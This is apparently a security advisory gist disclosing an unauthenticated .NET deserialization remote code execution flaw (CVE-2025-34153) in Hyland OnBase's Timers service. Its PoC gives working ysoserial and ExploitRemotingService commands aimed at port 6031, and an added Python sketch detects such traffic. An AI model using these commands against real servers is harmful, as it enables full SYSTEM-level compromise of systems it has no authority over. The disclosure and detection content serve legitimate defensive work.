@VAMorales
Last active August 13, 2025 16:48

Exploit Title: Hyland Software OnBase - Unauthenticated Remote Code Execution via .NET Deserialization

Disclosure Date: 04/09/2025

CVEID: CVE-2025-34153

Exploit Authors: Victor A. Morales, GM Sectec Inc.

Vendor Homepage: https://www.hyland.com/

Affected Versions: < 17.0.2.87 (other versions may be affected)

Known Fixed Version: 24.1 (earlier versions may contain a fix)

Description

The .NET Remoting TCP channel registered on port 6031 is affected by an unauthenticated deserialization vulnerability that leads to blind Remote Code Execution in the context of NT AUTHORITY\SYSTEM, the highest-privileged Windows account, resulting in full compromise of the system on which the OnBase Timers service is installed.

PoC

Using ysoserial.exe, a BinaryFormatter deserialization payload is generated with the TypeConfuseDelegate gadget to trigger Remote Code Execution on the server. As a proof of concept, the command below makes the remote server run “whoami” locally and write its output, the account currently running the service, to the file “C:\temp\whoami.txt”.

ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c 'whoami > c:\temp\whoami.txt' -o base64

Using ExploitRemotingService.exe, the base64-encoded payload generated by ysoserial.exe is passed as an argument and sent as a raw deserialization payload to the .NET Remoting TCP channel on port 6031, using the known URI endpoint TimerServer that is registered inside Hyland.Core.Timers.dll.

ExploitRemotingService.exe tcp://<onbase-server>:6031/TimerServer raw <ysoserial-payload>
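
Detection note (an added example, not part of the original advisory or of either tool): a .NET Remoting TCP request opens with a ".NET" preamble and carries its target URI in a frame header, so a sensor watching port 6031 can identify requests to the TimerServer endpoint before any payload is deserialized. The Python sketch below parses that frame header following the published MS-NRTP framing and flags requests from sources outside an allowlist; the allowlist address, the host name onbase.example and the sample frame are constructed assumptions.

```python
import struct
from urllib.parse import urlsplit

END, CUSTOM, REQUEST_URI = 0, 1, 4     # MS-NRTP header tokens used here
FIXED = {0: 0, 2: 1, 3: 2, 4: 4}       # data type -> size (void, byte, u16, i32)
ALLOWED_SOURCES = {"10.0.5.20"}        # assumption: hosts expected to use the service

def _counted_string(buf, pos):
    # CountedString: encoding byte (0 = UTF-16LE, 1 = UTF-8), int32 length, data
    enc, length = struct.unpack_from("<Bi", buf, pos)
    end = pos + 5 + length
    if length < 0 or end > len(buf):
        raise ValueError("truncated or malformed counted string")
    return buf[pos + 5:end].decode("utf-16-le" if enc == 0 else "utf-8"), end

def remoting_request_uri(stream):
    """Return the RequestUri of a .NET Remoting TCP request frame, else None."""
    try:
        if stream[:4] != b".NET":
            return None
        major, minor, op, dist = struct.unpack_from("<BBHH", stream, 4)
        if (major, minor) != (1, 0) or op not in (0, 1):  # request / one-way request
            return None
        pos = 10 + (4 if dist == 0 else 0)  # content length present only if not chunked
        while True:
            (token,) = struct.unpack_from("<H", stream, pos)
            pos += 2
            if token == END:
                return None
            if token == CUSTOM:             # custom header: name and value strings
                _, pos = _counted_string(stream, pos)
                _, pos = _counted_string(stream, pos)
                continue
            dtype, pos = stream[pos], pos + 1
            if dtype == 1:
                value, pos = _counted_string(stream, pos)
                if token == REQUEST_URI:
                    return value
            else:
                pos += FIXED[dtype]
    except (struct.error, IndexError, KeyError, ValueError):
        return None                         # truncated capture or not remoting traffic

def check_flow(src_ip, dst_port, first_bytes):
    """Return the requested endpoint path if the flow should raise an alert."""
    uri = remoting_request_uri(first_bytes)
    if dst_port != 6031 or uri is None or src_ip in ALLOWED_SOURCES:
        return None
    return urlsplit(uri).path

# Constructed sample: request frame header with an empty body (no payload).
_URI = b"tcp://onbase.example:6031/TimerServer"
SAMPLE = (b".NET\x01\x00" + struct.pack("<HHi", 0, 0, 0)
          + struct.pack("<HBBi", REQUEST_URI, 1, 1, len(_URI)) + _URI + b"\x00\x00")
```

A non-None result from check_flow means a host outside the allowlist addressed the remoting channel; restricting port 6031 to known hosts at the firewall and upgrading to the fixed version listed above remove the exposure rather than only detecting it.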